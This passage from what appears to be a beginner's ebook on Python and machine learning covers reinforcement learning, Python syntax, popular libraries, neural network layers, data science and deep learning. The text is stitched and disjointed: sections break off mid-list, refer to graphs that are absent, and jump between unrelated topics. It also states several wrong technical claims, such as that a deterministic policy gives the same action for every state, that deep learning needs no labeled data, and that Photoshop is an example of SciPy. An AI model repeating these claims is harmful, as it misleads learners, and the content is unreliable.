what not to do because should they do it, then they will certainly miss their
share of beef.
In the given paradigm, your dog is an agent exposed to the environment. You
may decide that your situation requires your sitting dog to walk when you utter a particular word. This agent responds by performing an action
where they transition from one state to another, like transitioning from sitting
to walking. In this case, the policy is a process of choosing an action given a
state with the expectation of better results. After transitioning, the agent may
get a penalty or a reward in response.
Reinforcement Learning Algorithms
There are three techniques in implementation of a reinforcement learning
algorithm.
Value-based: here, the agent anticipates the long-term return of the prevailing states under a policy, so you ought to maximize the value function.
Policy-based: under this RL scheme you endeavor to find a policy
such that the action executed in each state leads to maximal reward in
the future.
Policy-based methods are further classified into deterministic, where the policy produces the same action for any state, and stochastic, where every action has a definite probability determined by the stochastic policy: π(a|s) = P[A_t = a | S_t = s].
Model-based: in this case you are expected to generate a virtual model
for every environment, where the agent learns how to perform in that
very environment.
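The pieces above (agent, environment, reward, state, policy, Q value) can be seen working together in a value-based method such as Q-learning. This is a minimal sketch on an invented five-cell corridor where the agent earns a reward only by reaching the rightmost cell; the learning rate, discount, and episode count are arbitrary choices for the example.

```python
import random

random.seed(0)

n_states = 5             # cells 0..4 of a tiny corridor; cell 4 pays the reward
actions = [-1, +1]       # move left or move right
alpha, gamma = 0.5, 0.9  # learning rate and discount factor (arbitrary choices)

# Q value: expected long-term return of taking an action in a state.
Q = {(s, a): 0.0 for s in range(n_states) for a in actions}

for episode in range(200):
    s = 0
    while s != 4:
        a = random.choice(actions)             # explore at random
        s2 = min(max(s + a, 0), n_states - 1)  # environment returns the next state
        r = 1.0 if s2 == 4 else 0.0            # instant reward
        # Value-based update: pull Q(s, a) toward reward + discounted future value.
        best_next = max(Q[(s2, b)] for b in actions)
        Q[(s, a)] += alpha * (r + gamma * best_next - Q[(s, a)])
        s = s2

# The learned policy chooses, in each state, the action with the higher Q value.
policy = {s: max(actions, key=lambda a: Q[(s, a)]) for s in range(4)}
print(policy)
```

With enough random episodes, the policy settles on moving right (+1) in every cell, which is the optimal behavior in this toy environment: nobody told the agent the rule, it discovered it from rewards alone.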
We have spent some time talking about the Python coding language and
some of the neat things that you can do with this. However, to complete this
book, we also need to get a good understanding of the Python language and
what it is all about. Different parts show up in the Python coding language, but knowing some of the basics, as well as learning some of the power that comes with Python, makes all the difference in the success you can have when you combine this coding language with machine learning.
We have talked briefly about the Python coding language already, as well as
some of the reasons why it may be so beneficial when you want to work with
machine learning. Even though it is considered one of the easier coding
languages to learn how to work with, it has a lot of power and strength that
comes in behind it, which makes it the best option to use whether you are a
beginner or someone who has been coding for quite some time. And since the
Python language does have some of the power of the bigger and more
powerful coding languages, you will be able to do a lot of cool things with
machine learning.
There are going to be a few different parts that come into play when you start
to learn how to work with the Python code even with machine learning. You
can work with the comments, functions, statements, and more. Let’s take a
look at some of the basic parts that come with coding in Python so that we
can do some of these more complicated things together as we progress
through machine learning.
The Comments
The first aspect of the Python coding language that we need to explore is that
of comments. There is going to be some point when you are writing out a
code where you would like to take a break and explain to others and yourself
what took place in the code. This is going to ensure that anyone who sees the
code knows what is going on at one point to another. Working with a
comment is the way that you would showcase this in your project, and can
make it easier for others to know the name of that part, or why you are doing
one thing compared to another.
When you would like to add in some comments to the code, you are going to
have a unique character that goes in front of your chosen words. This unique
code is going to be there to help you tell the computer program that it should
skip reading those words and move on to the next part of the code instead.
The unique character that you are going to use for this one is the # sign in
front of the comments you are writing. When the compiler sees this, it is
going to know that you don’t want that part of the code to execute at all. It will skip to the next line before it starts reading the code again. An example of a comment that you may see in your code would include:
#this is a new comment. Please do not execute in the code.
After you have written out the comment that you want here, and you are done
with it, you are then able to hit the return button or enter so that you can write
more code that the compiler can execute. You can have the freedom to
comment as long or as short as you would like based on what you would need
in the code. And you can write in as many of these comments as you would
like. It is usually seen as a better option if you keep the comments down to
what you need. Otherwise, it makes the code start to look a little bit messy
overall. But you can technically add in as many of these comments to your
code as you would like.
The Statements
The next part of the code that we need to focus on is the statements. Any time
that you are starting with your new code, whether you are working with
Python or with some other coding language along the way, you must add
these statements inside of the code. This allows the compiler to know what
you would like to happen inside. A statement is going to be a unit of code
that you would like to send to your interpreter. From there, the interpreter is
going to look over the statement and execute it based on the command that
you added in.
Any time you decide to write out the code, you can choose how many
statements are needed to get the code to work for you. Sometimes, you need
to work with one statement in a block of code, and other times, you will want
to have more than one. As long as each statement is written where the interpreter expects it, it is fine to make a statement as long as you would like, and to include as many statements as you would like.
When you are ready to write your code and add in at least one statement to
your code, you would then need to send it over so that the interpreter can
handle it all. As long as the interpreter can understand the statements that you
are trying to write out, it is going to execute your command. The results of
that statement are going to show up on the screen. If you notice that you write
out your code and something doesn’t seem to show up in it the right way,
then you need to go back through the code and check whether they are
written the right way or not.
Now, this all may sound like a lot of information, but there is a way to
minimize the confusion and ensure that it can make more sense to you. Let’s
take a look at some examples of how this is all going to work for you.
x = 56
Name = "John Doe"
z = 10
print(x)
print(Name)
print(z)
When you send this over to the interpreter, the results that should show up on
the screen are:
56
John Doe
10
It is as simple as that. Open up Python, and give it a try to see how easy it is
to get a few things to show up in your interpreter.
The Variables
The next things we consider inside our Python codes are the variables. These
variables are important to learn about because they are the parts that store your values so you can pull them up later on. This means that if you do this process in the right way, the values are going to be found inside the right spots of the computer's memory. The data in the code will help determine which spots of memory these values are stored in, and this makes it easier for you to find the information when it is time to run the code.
The first thing that we need to focus on here is to make sure that the variable
has a value assigned to it. If there is a variable without a value, then the
variable won’t have anything to save and store. If the variable is given a good
value from the start, then it will behave the way you are expecting when you
execute the program.
When it comes to your Python code, there are going to be three types of
variables that you can choose from. They are all important and will have their
place to work. But you have to choose the right one based on the value that
you would like to attach to that variable.
Scikit-Learn
This library is built from major components of NumPy and SciPy. Scikit-learn adds sets of algorithms that are useful in machine learning and in tasks related to data mining, including:
k-means
decision trees
linear and logistic regression
clustering
That is, it helps in
classification, clustering, and even regression analysis. There are also other
tasks that this library can efficiently deliver. A good example includes
ensemble methods, feature selection, and more so, data transformation. It is
good to understand that the pioneers or experts can easily apply this if at all,
they can be able to implement the complex and sophisticated parts of the
algorithms.
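As a taste of the kind of algorithm this library packages up, here is a hedged from-scratch sketch of k-means on invented one-dimensional data; the scikit-learn version (sklearn.cluster.KMeans) handles many dimensions, initialization, and convergence checks for you.

```python
# Invented 1-D data with two obvious groups.
points = [1.0, 1.2, 0.8, 8.0, 8.4, 7.9]
centers = [0.0, 10.0]  # deliberately rough starting guesses

for _ in range(10):  # a fixed number of refinement rounds
    # Assignment step: attach each point to its nearest center.
    clusters = [[], []]
    for p in points:
        nearest = min(range(2), key=lambda i: abs(p - centers[i]))
        clusters[nearest].append(p)
    # Update step: move each center to the mean of its cluster.
    centers = [sum(c) / len(c) for c in clusters]

print(centers)  # the centers settle near 1.0 and 8.1
```

The two alternating steps, assign then update, are the whole algorithm; the library version simply generalizes them and guards against edge cases such as empty clusters.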
TensorFlow
It is a library for algorithms that involve deep learning. Such algorithms are not always necessary, but one good thing about them is their ability to give correct results when done right. TensorFlow also enables you to run your computations on a CPU or GPU: you can write the code in a Python program, compile it, and then run it on your processor. This gives you an easy time performing your analysis, and there is no need to have these pieces written in C++ or in lower-level interfaces such as CUDA.
TensorFlow uses nodes, especially multi-layered ones. The nodes perform several tasks within the system, which include setting up artificial neural networks, training them, and handling high volumes of data. Several Google products, including its search engine, depend on this type of library. One main application is the identification of objects; it also helps in different apps that deal with voice recognition.
Theano
Theano, too, forms a significant part of the Python library ecosystem. Its vital task is to help with anything related to numerical computation, and in that respect we can relate it to NumPy.
Pandas
Pandas is another significant Python library, used for data analysis and manipulation. It plays several roles, such as:
Splitting of data
Merging of two or more types of data
Data aggregation
Selecting or subsetting data
Data reshaping
Diagrammatic explanation: a one-dimensional Series pairs index labels with values:
A 7
B 8
C 9
D 3
E 6
F 9
You can quickly delete columns from, or add columns and text to, a DataFrame
It will help you in data conversion
Pandas can handle misplaced or missing data
It has a powerful ability to group data according to functionality
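The grouping and aggregation that Pandas automates can be sketched with nothing but the standard library; the records and keys below are invented for the example, and the result is roughly what df.groupby("department")["sales"].sum() would give you in Pandas.

```python
from collections import defaultdict

# Invented records: (department, sales).
rows = [("fruit", 10), ("fruit", 15), ("dairy", 7), ("dairy", 3)]

# Group by department...
groups = defaultdict(list)
for dept, sales in rows:
    groups[dept].append(sales)

# ...then aggregate each group with a sum.
totals = {dept: sum(vals) for dept, vals in groups.items()}
print(totals)  # {'fruit': 25, 'dairy': 10}
```

Pandas does the same split-apply-combine work, but over whole tables, with many aggregation functions, and far faster on large data.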
Matplotlib
This is another sophisticated and helpful data analysis tool, one that helps with data visualization. Its main objective is to show an industry where it stands, using the various inputs. Your production goals are meaningless when you fail to share them with the different stakeholders, and Matplotlib comes in handy with the types of charts required to do so. It has long been the Python library that scientists, especially those dealing with data, prefer. This library looks good when it comes to graphics and images, and many prefer using it to create various graphs for data analysis, although the technological world keeps changing as new, advanced libraries flood the industry.
It is also flexible, and due to this, you are capable of making several graphs
that you may need. It only requires a few commands to perform this.
In this Python library, you can create diverse graphs, charts of all kinds, histograms, and scatterplots. You can also make non-Cartesian charts using the same principle.
Diagrammatic explanations
The above graph highlights the overall production of a company within three
years. It specifically demonstrates the usage of Matplotlib in data analysis.
By looking at the diagram, you will realize that production in one year was high compared to the other two years. Again, the company performs well in the production of fruits, since fruit was leading in both years 1 and 2, with a tie in year 3. From the figure, you realize that your work of presentation,
representation and even analysis has been made easier as a result of using this
library. This Python library will eventually enable you to come up with good
graphics images, accurate data and much more. With the help of this Python
library, you will be able to note down the year your production was high,
thus, being in a position to maintain the high productivity season.
It is good to note that this library can export graphics and can change these graphics into PDF, GIF, and so on.
Seaborn
Diagrammatic Illustrations
The above line graph clearly shows the performance of the different machines the company is using. Following such a diagram, you can deduce and conclude which machines the company should keep using to get the maximum yield. On most occasions, this method of evaluation, with the help of the Seaborn library, will enable you to predict the exact abilities of your different inputs. Again, this information can help for future reference when purchasing more machines. The Seaborn library also has the power to chart the performance of other variable inputs within the company. For example, the number of workers within the company can easily be identified along with their corresponding working rates.
NumPy
This is a very widely used Python library. Its features enable it to perform multidimensional array processing as well as matrix processing, with the help of an extensive collection of mathematical functions. It is important to note that this Python library is highly useful in solving the most significant computations within the scientific sector. NumPy is also applicable in areas such as linear algebra, random number generation, and Fourier transforms. Other high-end Python libraries, such as TensorFlow, use NumPy internally for tensor manipulation. In short, NumPy is mainly for calculation and data storage, and it also has features that let you load data into, or export data from, Python. This Python library is also known as Numerical Python.
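A hedged taste of the array processing described above, with invented values (this assumes NumPy is installed):

```python
import numpy as np

# Two 2-D arrays (matrices).
a = np.array([[1.0, 2.0], [3.0, 4.0]])
b = np.array([[5.0, 6.0], [7.0, 8.0]])

print(a + b)     # elementwise addition
print(a @ b)     # matrix multiplication: [[19, 22], [43, 50]]
print(a.mean())  # a quick statistic over every element: 2.5
```

Everything here runs as a whole-array operation in compiled code, which is why NumPy underpins so many of the other libraries in this chapter.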
SciPy
This is among the most popular libraries used in industry today. It comprises different modules that are applicable in the optimization side of data analysis. It also plays a significant role in integration, linear algebra, and other forms of mathematical statistics.
In many cases, it plays a vital role in image manipulation, a process that is widely applicable in day-to-day activities; Photoshop-style editing is an example of what SciPy's image routines can do. Many organizations prefer SciPy for their image manipulation, especially for pictures used in presentations. For instance, a wildlife society could take a picture of a cat and then manipulate it using different colors to suit their project. Below is an example that helps you understand this more straightforwardly. The picture has been manipulated:
The original input image was a cat that the wildlife society took. After
manipulation and resizing the image according to our preferences, we get a
tinted image of a cat.
Keras
This is also part and parcel of the Python library ecosystem, especially within machine learning. It belongs to the group of high-level neural network libraries. It is significant to note that Keras is capable of running on top of other libraries, especially TensorFlow and Theano, and it can operate nonstop without mechanical failure. In addition to this, it works well on both the GPU and CPU. For most beginners in Python programming, Keras offers a secure pathway toward ultimate understanding: they will be in a position to design a network and even to build it. Its ability to prototype quickly makes it the best Python library among learners.
PyTorch
This is another accessible, open-source Python library. It boasts an extensive choice of tools and is applicable in areas such as computer vision, where visual processing plays an essential role in several types of research. It also aids in natural language processing. More so, PyTorch can undertake technical tasks for developers, that is, enormous calculations and computational data analysis. It can also help in creating graphs used for computational purposes. Since PyTorch is built around tensors, and tensors can be moved to a GPU, its computations can be accelerated.
Scrapy
Scrapy is another library, used for creating crawling programs, that is, spider bots and the like. Spider bots frequently help in data retrieval and in collecting the URLs used on the web. In the beginning, Scrapy was meant to assist in data scraping. However, it has undergone several evolutions that expanded its general purpose, so the main task of the Scrapy library in the present day is to act as a general-purpose crawler, promoting general usage, the application of universal code, and so on.
Statsmodels
Statsmodels is a library with the aim of data exploration using several methods of statistical computation and data assertion. It has many features, such as result statistics, which it provides with the help of various models, including linear regression, multiple estimators, time series analysis, and other linear models. Other models, such as discrete choice, are applicable here as well.
Benefits of Applying Python in Machine Learning
Programming
For machine learning algorithms, we must have a programming language that
is clear and easy to be understood by a large portion of data researchers and
scientists. A language with libraries that are useful for different types of work, and for matrix math in particular, will be preferable. Moreover, it is a great advantage to use a language with a large number of active developers.
These features make Python the best choice. The main advantages of Python
can be summarized in the following points:
Hidden Layer
This layer utilizes a structure of weighted links to process values. It
multiplies the values getting into the stratum by weights and then adds the
weighted inputs to obtain a single number. The weighting, in this case, refers
to a group of preset numbers that the program stores. The hidden layer
implements particular conversions to the input values in the system.
Output Layer
This layer obtains links from the input layer or the hidden layer and provides
an output that matches the prediction of the feedback variable. The selection
of suitable weights leads to the layer producing relevant manipulation of data.
In this layer, the active nodes merge and modify the data to generate the
output value.
To summarize, the input layer contains input neurons that convey information to the hidden layer, and the hidden layer passes the data on to the output layer. Synapses in a neural network are the adjustable connections that turn a neural system into a parameterized network. Hence, every neuron in the neural network has weighted inputs, an activation function, and an output. The weighted connections represent the synapses, while the activation function determines the output for a given input.
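The weighted sum and activation described above can be condensed into a few lines of NumPy. This is a minimal sketch of a single neuron; the inputs, weights, and bias below are made-up values for illustration only:

```python
import numpy as np

def sigmoid(z):
    # A common activation function that squashes any value into (0, 1)
    return 1.0 / (1.0 + np.exp(-z))

# Hypothetical values arriving at one hidden-layer neuron
inputs = np.array([0.5, -1.2, 3.0])
# Preset weights stored by the program, plus a bias term
weights = np.array([0.4, 0.1, -0.6])
bias = 0.2

# Multiply the inputs by the weights, add them up to a single number,
# then apply the activation function to produce the neuron's output
weighted_sum = np.dot(inputs, weights) + bias
output = sigmoid(weighted_sum)
print(output)
```

A full layer simply repeats this computation for every neuron, which is why layers are usually implemented as one matrix multiplication.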
Advantages and Disadvantages of Neural Networks
There are some advantages and disadvantages to using Artificial Neural
Networks. Understanding them can enable one to comprehend better the
operations and shortcomings involved in the neural networks.
Advantages of Artificial Neural Networks
The following are the advantages of Artificial Neural Networks, which help a
person to learn the benefits of using the neural systems.
a) Ability to Learn – Artificial neural systems learn from circumstances and events, and make decisions by comparing new cases with similar past occurrences.
b) Ability to Work with Incomplete Knowledge – Proper training enables
the network to provide output even when the information is insufficient or
incomplete.
c) Having a Distributed Memory – A programmer uses examples to teach the neural network and get it to produce the desired outputs, training the system on as much relevant detail as possible. The examples should comprise all the information and cases needed for the network to learn well. This training gives the system a memory of relevant details that allows it to produce suitable outputs. The better the examples used in training, the less likely the neural network is to produce false outputs.
d) Parallel Processing Capability – The networks can carry out several jobs at the same time thanks to their numerical structure, processing many numerical operations simultaneously and at high speed.
e) Storing Information on the Entire Network – The system stores
information on the whole network and not in databases. It enables the system
to continue operating even in cases where a section loses some information
details.
f) Having Fault Tolerance – The network is fault-tolerant in that it can
carry on providing output even in situations where one or more cells decay.
g) Gradual Corruption – Degradation in the network does not happen abruptly; it occurs slowly and progressively over time, which means the system can still be used despite partial degradation.
One of the main reasons that we have spent so much of our time taking a look
at machine learning and what we are able to do with it along with Python is
that we want to be able to use this to help us out with data science. Many
companies are diving into the idea of data science and all that this method is
able to do for them, and whether your business is looking to expand to a new
area or you would like to reach more customers or release a new product,
data science will be able to help you out.
Now, there are going to be a few different steps that come with data science
in order to make sure that it is as successful as possible. But overall, it is
going to consist of many machine learning and Python algorithms that will
help us to take our prepared data, and organize it in a way that we are able to
use later on. But there is definitely a lot more that we are able to do with the
help of data science, and we are going to spend a bit of time exploring that
now. In this chapter, we are going to look at a few important steps in this
process including the basics of what data science is all about, how deep
learning comes into play, and how data preparation can be the tool we need
as well.
What is Data Science?
The first topic that we are going to spend some time on here is all about data
science. Data science, to keep things simple, is the detailed study of the flow of information through the large amounts of data a company has gathered, in the hope of learning something from it. In our
modern world, there is information no matter which way we turn. Companies
are able to use this data, and simply by setting up their accounts on social
media or using other methods, they can collect a lot of data from their
customers, and use this in many different manners.
While gathering up all of this different information is important, and may
seem like the only thing a company needs to do, the problem is going to
really show up when we try to figure out the steps that we should take with
all of that data. It doesn’t do us a lot of good to just hold onto that
information without an idea of what we are able to do with it, or even any
ideas on what we will be able to find inside of that data. And because there is
a lot of data, usually more than we realize when we get started, it is hard for
us to simply assign a person, or even a team, to look through that data, and
efficiently and quickly find the patterns and insights that are in that set of
data.
Data science is here in order to handle this kind of problem. It is going to step
in to help us figure out what is found in the information, and even how to
store the information. And with the help of artificial intelligence and machine
learning, which we will talk about a bit later, we will find that data science
will be able to go through the information and find what trends are there,
especially the ones that are hidden.
When it comes to data science, we are going to obtain meaningful insights from raw and unstructured data, which is then processed using business, programming, and analytical skills.
Let’s take a look at more about what this data science is all about, why it is
important, and some of the different parts of the data science cycle.
Right now, roughly 2.5 quintillion bytes of data are generated each day for companies to use, and that figure keeps growing as the Internet of Things expands. This is an extraordinary amount of data, which companies can use to learn about their customers, decide which products to release next, and improve the customer service they provide. Data science can help a company in a variety of ways, including:
1. Helping the company learn new ways where they can reduce
costs each day.
2. It can help the company figure out the best method to take to
get into a new market that will be profitable for them.
3. This can help the company learn about a variety of
demographics and how to tap into these
4. It can help the company to take a look at the marketing
campaign that they sent out there and then figure out if the
marketing campaign was actually effective.
5. It can make it easier for the company to successfully launch a new service or product.
We have already spent some time taking a look at the lifecycle that comes
with data science, but to help us learn more about it, and to have a review,
let’s go over the steps. We will need to come up with the main business
problem that we would like to solve and then begin collecting the data that
we want to use. Since this data is going to be found in a lot of different
locations, we will be able to format it, clean it off, and make sure that the
outliers, duplicates, and missing values are taken care of.
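The cleaning step above can be sketched with pandas. This is a minimal example on a tiny made-up data set with the usual problems, a duplicate row and a missing value:

```python
import pandas as pd

# Invented data for illustration: "Ben" appears twice, and
# "Cara" is missing her spend value
df = pd.DataFrame({
    "customer": ["Ann", "Ben", "Ben", "Cara"],
    "spend":    [120.0, 80.0, 80.0, None],
})

# Remove exact duplicate rows
df = df.drop_duplicates()

# Fill the missing spend with the median of the remaining values
df["spend"] = df["spend"].fillna(df["spend"].median())

print(df)
```

Real data sets need more care than this (outlier checks, type fixes, consistent units), but the shape of the work is the same: inspect, deduplicate, and handle missing values before modeling.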
From there, we are able to deal with the data through an algorithm. With the
help of the Python coding language and all of the features that it is able to
provide, we will see that there are a ton of algorithms that work well for this
process. We can choose the one that we need, and then do some training and
testing of the information ahead of time to make sure it is ready for making
predictions. We can then finish off the whole thing with some visualizations
that make it easier to see some of the complex relationships and correlations
that happen inside of our data.
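The train-and-test step described above can be sketched with scikit-learn, one of the Python libraries commonly used for this. The data here is synthetic, generated just to show the workflow:

```python
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split

# Synthetic data: one feature with a roughly linear relationship to the target
rng = np.random.default_rng(42)
X = rng.uniform(0, 10, size=(200, 1))
y = 3.0 * X[:, 0] + rng.normal(scale=0.5, size=200)

# Hold some data back so the trained model is tested on unseen examples
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=0)

model = LinearRegression().fit(X_train, y_train)
score = model.score(X_test, y_test)  # R-squared on the held-out data
print(score)
```

Swapping in a different estimator class is all it takes to try another algorithm, which is why this split-train-evaluate loop is the backbone of most data science projects in Python.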
From there, we need to move on to some of the components that will show up
in our data science project. There are a lot of components that need to come
together and need to work together to ensure we are actually able to get the
most out of any data science project we are working with.
The first component that we need to spend some time on is to pay attention to
the types of data that we are working with. The raw data that we have is so
important because it is going to be the foundation for all of the other things
that we do through this process. The two main types of data you will encounter are structured data, the kind found in tabular form or a data set, and unstructured data, which includes images, videos, emails, and PDF files, to name a few.
The second component that we are going to find when we look at data science is programming. You have to write some code in order to build the mathematical models we talked about earlier, and to get them to sort through the information and make predictions. All of the analysis and management of the data is done through computer programming. The two most popular languages used in data science are R and Python, so learning one of these can be helpful.
Next on the list is going to be probability and statistics. Data is going to be
manipulated in a manner that it is able to extract information and trends out
of that data. Probability and statistics are going to be the mathematical
foundation that brings it all together. Without having a good idea and a lot of
knowledge about these two topics, it is possible that you will misinterpret the
data, and will come up with conclusions that are not correct. This is a big
reason why probability and statistics are going to be so important to the world
of data science.
We also have to take a look at the idea of machine learning when we are
looking at data science. When someone is working through all of that big
data and everything that is contained inside of it, they are also going to use a
lot of the algorithms that come with machine learning. This can include the
methods of classification and regression at the same time.
And the final key component that we need to spend some time on here is the
idea of big data. In the world we live in today, raw data is so important, but
we need to be able to take it and turn it into something that we are actually
able to use. There is a lot of good information in all of that data, but if it is
just sitting there, and we are not able to get all of that information out of it
that we need, then it is going to be worthless to us.
This is where the Python algorithms are really going to come into play. You
will find that when we pick out the algorithms and use the right ones, we can
take all of this raw data, the data that may be a mess, unorganized, and hard
to work with, and can actually turn it into something that we are able to use
and appreciate overall.
There is a great deal we can accomplish with data science, but it has many moving parts, and we need to understand each of them before we can put the whole process to work.
Chapter 12 A Quick Look at Deep Learning
Artificial intelligence is a field of study that has come up in many
conversations for years. A few years ago, this was a futuristic concept that
was propagated in movies and comic books. Through years of development
and research, we are currently experiencing the best of artificial intelligence.
In fact, it is widely expected that AI will help us usher in the new frontier in
computing.
Artificial intelligence might share some similarities with machine learning
and deep learning, but they are not the same thing. Many people use these
terms interchangeably without considering the ramifications of their
assumptions. Deep learning and machine learning are knowledge branches of
artificial intelligence. While there are different definitions that have been
used in the past to explain artificial intelligence, the basic convention is that
this is a process where computer programs are built with the capacity to
operate and function like a normal human brain would.
The concept of AI is to train a computer to think the same way a human brain
thinks and functions. In as far as the human brain is concerned, we are yet to
fully grasp the real potential of our brains. Experts believe that even the most
brilliant individuals in the world are unable to fully exhaust their brain
capacity.
This, therefore, creates a conundrum, because if we are yet to fully
understand and test the limits of our brains, how can we then build computing
systems that can replicate the human brain? What happens if computers learn
how to interact and operate like humans to the point where they can fully use
their brainpower before we learn how to use ours?
So far, the true power of AI and the limits of its thinking capacity have yet to be established. However, researchers and other experts in the field have made
great strides over the years. One of the closest examples of AI that espouses
these values is Sophia. Sophia is probably the most advanced AI model in the
world right now. Perhaps given our inability to fully push the limits of our
brains, we might never fully manage to push the limits of AI to a point where
they can completely replace humans.
Machine learning and deep learning are two branches of artificial intelligence
that have enjoyed significant research and growth over the years. The
attention towards these frameworks especially comes from the fact that many
of the leading tech companies in the world have seamlessly implemented
them in their products, and integrated them into human existence. You
interact with these models all the time on a daily basis.
Machine learning and deep learning do share a number of features, but they
are not the same. Just as is the case with comparing these two with artificial
intelligence. In your capacity as a beginner, it is important to learn the
difference between these studies, so that you can seek and find amazing
opportunities that you can exploit and use to further your skills in the
industry. In a world that is continually spiraling towards increased machine
dependency, there are many job openings in machine learning and deep
learning at the moment. There will be so much more in the near future too, as
people rush to adapt and integrate these systems into their daily operations
and lives.
Deep Learning vs Machine Learning
Before we begin, it is important that you remind yourself of the basic
definitions or explanations of these two subjects. Machine learning is a
branch of artificial intelligence that uses algorithms to teach machines how to
learn. Further from the algorithms, the machine learning models need input
and output data from which they can learn through interaction with different
users.
When building such models, it is always advisable to ensure that you build a
scalable project that can take new data when applicable and use it to keep
training the model and boost its efficiency. An efficient machine learning
model should be able to self-modify without necessarily requiring your input,
and still provide the correct output. It learns from structured data available
and keeps updating itself.
Deep learning is a class of machine learning that uses the same algorithms
and functions used in machine learning. However, deep learning introduces
layered computing beyond the power of algorithms. Algorithms in deep
learning are used in layers, with each layer interpreting data in a different
way. The algorithm network used in deep learning is referred to as artificial
neural networks.
The name artificial neural networks gives us the closest iteration of what
happens in deep learning frameworks. The goal here is to try and mimic the
way the human brain functions, by focusing on the neural networks. Experts
in deep learning sciences have studied and referenced different studies on the
human brain over the years, which has helped spearhead research into this
field.
Problem Solving Approaches
Let’s consider an example to explain the difference between deep learning
and machine learning.
Say you have a database that contains photos of trucks and bicycles. How can
you use machine learning and deep learning to make sense of this data? At
first glance, what you will see is a group of trucks and bicycles. What if you
need to identify photos of bicycles separately from trucks using these two
frameworks?
To help your machine learning algorithm identify the photos of trucks and
bicycles based on the categories requested, you must first teach it what these
photos are about. How does the machine learning algorithm figure out the
difference? After all, they almost look alike.
The solution is in a structured data approach. First, you will label the photos
of bicycles and trucks in a manner that defines different features that are
unique to either of these items. This is sufficient data for your machine
learning algorithm to learn from. Based on the input labels, it will keep
learning and refine its understanding of the difference between trucks and
bicycles as it encounters more data. From this simple illustration, it will keep
searching through millions of other data it can access to tell the difference
between trucks and bicycles.
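The labeled, structured-data approach described above can be sketched with scikit-learn. The feature values below (weight in kilograms, number of wheels) are invented purely for illustration:

```python
from sklearn.tree import DecisionTreeClassifier

# Hypothetical labeled examples: [weight_kg, wheel_count]
features = [
    [9000, 6], [12000, 8], [7500, 6],   # trucks
    [12, 2], [10, 2], [14, 2],          # bicycles
]
labels = ["truck", "truck", "truck", "bicycle", "bicycle", "bicycle"]

# The classifier learns the difference from the labels we supplied
clf = DecisionTreeClassifier().fit(features, labels)

# It then generalizes to a new, unseen example
prediction = clf.predict([[11, 2]])[0]
print(prediction)  # → "bicycle"
```

Notice that a human had to decide which features matter (weight, wheels) and to label every training example; that is exactly the structured-data requirement the text describes.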
How do we solve this problem in deep learning?
The approach in deep learning is different from what we have done in
machine learning. The benefit here is that in deep learning, you do not need
any labeled or structured data to help the model identify trucks from bicycles.
The artificial neural networks will identify the image data through the
different algorithm layers in the network. Each of the layers will identify and
define a specific feature in the photos. This is the same method that our
brains use when we try to solve some problems.
Generally, the brain considers a lot of possibilities, ruling out all the wrong
ones before settling on the correct one. Deep learning models will pass
queries through several hierarchical processes to find the solution. At each
identification level, the deep neural networks recognize some identifiers that
help in distinguishing bicycles from trucks.
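The layered, hierarchical processing described above can be sketched as a tiny feed-forward pass in NumPy. The weights here are random stand-ins; in a real deep learning model they would be learned from millions of images:

```python
import numpy as np

def relu(z):
    # Each layer applies a nonlinearity after its weighted sum
    return np.maximum(0.0, z)

rng = np.random.default_rng(1)

# A flattened toy "image" of 16 pixels passing through three layers,
# each extracting progressively more abstract features
x = rng.random(16)
W1 = rng.random((8, 16))   # layer 1: low-level identifiers (edges, shapes)
W2 = rng.random((4, 8))    # layer 2: intermediate features (wheels, frames)
W3 = rng.random((2, 4))    # output layer: one score per class

h1 = relu(W1 @ x)
h2 = relu(W2 @ h1)
scores = W3 @ h2           # e.g. [truck_score, bicycle_score]

print(scores.shape)  # → (2,)
```

The class with the higher score would be the network's prediction; each hidden layer's output is the "identifier" that the next level builds on.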
This is the simplest way to understand how these two systems work. Both
deep learning and machine learning, however, might not necessarily be
applicable methods to tell these photos apart. As you learn about the
differences between these two fields, you must remember that you have to
define the problem correctly, before you can choose the best approach to
implement in solving it. You will learn how to choose the right approach at a
later stage in your journey into machine learning, which has been covered in
the advanced books in this series.
From the example illustrated above, we can see that machine learning
algorithms need structured data to help them tell the difference between
trucks and bicycles. From this information, they can then produce the correct
output after identifying the classifiers.
In deep learning, however, your model can identify images of the trucks and
bicycles by passing information through several data processing layers in its
framework. There is no need for structured data. To make the correct
prediction, deep learning frameworks depend on the output provided at every
data processing layer. This information then builds up and presents the final
outcome. In this case, it rules out all possibilities to remain with the only
credible solution.
From our illustrations above, we have learned some important facts that will
help you distinguish deep learning from machine learning as you learn over
the years. We can summarize this in the following points:
● Data presentation
The primary difference between machine learning and deep learning is
evident in the way we introduce data into the respective models. With
machine learning models, you will almost always need to use structured data.
However, in deep learning, the networks depend on artificial neural network
layers to identify unique features that help to identify the data.
● Algorithms and human intervention
The emphasis of machine learning is to learn from interacting with different inputs and usage patterns. From such interaction, machine learning models can produce better output the longer they learn and the more interaction they receive.
To aid this cause, you must also try to provide as much new data as possible.
When you realize that the output presented is not what you needed, you must
retrain the machine learning model to deliver a better output. Therefore, for a
system that should work without human intervention, you will still have to be
present from time to time.
In deep learning, your presence is not needed. All the nested layers within the
neural networks process data at different levels. In the process, however, the
model might encounter errors and learn from them.
This is the same way that the human brain works. As you grow up, you learn
a lot of important life skills through trial and error. By making mistakes, your
brain learns the difference between positive and negative feedback, and you
strive to achieve positive results whenever you can.
To be fair, even in deep learning, your input will still be required. You cannot
confidently assume that the output will always be perfect. This particularly
applies when your input data is insufficient for the kind of output you
demand from the model.
The underlying factor here is that both machine learning and deep learning rely on data. The quality of data you have will make a lasting impact on
the results you get from these models. Speaking of data, you cannot just use
any data you come across. To use either of these models effectively, you
must learn how to inspect data and make sure you are using the correct
format for the model you prefer.
Machine learning algorithms will often need labeled, structured data. For this
reason, they are not the best option if you need to find solutions to
sophisticated problems that need massive chunks of data.
In the example we used to identify trucks from bicycles, we tried to solve a
very simple issue in a theoretical concept. In the real world, however, deep
learning models are applied in more complex models. If you think about the
processes involved, from the concepts to hierarchical data handling and the
different number of layers that data must pass through, using deep learning
models to solve simple problems would be a waste of resources.
While all these classes of AI need data to help in conducting the intelligence
we require, deep learning models need significantly wider access to data than
machine learning algorithms. This is because a deep learning model must, in effect, rule out every alternative possibility before it commits to an output.
Deep learning models can easily identify differences and concepts in the data
processing layers for neural networks only when they have been exposed to
millions of data points. This helps to rule out all other possibilities. In the
case of machine learning, however, the models can learn through criteria that
are already predetermined.
Different Use Cases
Having seen the difference between machine learning and deep learning,
where can these two be applied in the real world? Deep learning is a credible
